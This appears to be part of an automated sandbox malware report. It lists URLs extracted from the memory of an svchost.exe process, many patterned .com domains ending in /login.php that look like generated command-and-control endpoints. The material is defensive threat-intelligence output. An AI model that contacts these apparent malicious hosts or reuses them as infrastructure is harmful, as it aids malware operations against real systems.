    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599494029.00000000008F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfox.com/login.php
    Source: svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygyn.com/login.php
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/http://purymuq.com/
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/http://vopyqim.com/http://ganyfes.com/http://purymuq.com/http://purymuq.com/0Y
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/login.php
    Source: svchost.exe, 00000002.00000003.1580252694.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579912316.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585285219.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynad.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryson.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytyx.com/login.php
    Source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvex.com/login.php
    Source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvex.com/login.phpg
    Source: svchost.exe, 00000002.00000003.1820622823.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546391419.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywax.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824832708.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1829965352.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywax.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywoj.com/login.php
    Source: svchost.exe, 00000002.00000003.2026567354.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024313127.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024037953.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywur.com/
    Source: svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxij.com/
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxij.com/login.php
    Source: svchost.exe, 00000002.00000003.1590653691.0000000003A2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613758963.0000000002959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610951340.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599945595.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607634712.000000000294D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616141302.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600751317.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616936571.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609459423.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfyj.com/login.php
    Source: svchost.exe, 00000002.00000003.1579481931.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586377868.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585383980.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577836262.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583773094.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586144218.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573220991.000000000600B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyger.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysygij.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyjid.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysynur.com/H
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysynur.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvan.com/login.php
    Source: svchost.exe, 00000002.00000003.1657651816.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658175800.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670053722.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658387523.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670914897.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvax.com/login.php
    Source: svchost.exe, 00000002.00000003.2063012726.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2038097652.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637675576.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638312778.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044633046.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044910027.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2041626370.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysywyd.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxuj.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyfad.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyguj.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106241770.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygyd.com/
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106241770.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygyd.com/H
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyjoj.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylyn.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymun.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymun.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvysaj.com/login.php
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytan.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytud.com/
    Source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2649652867.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytuj.com/login.php
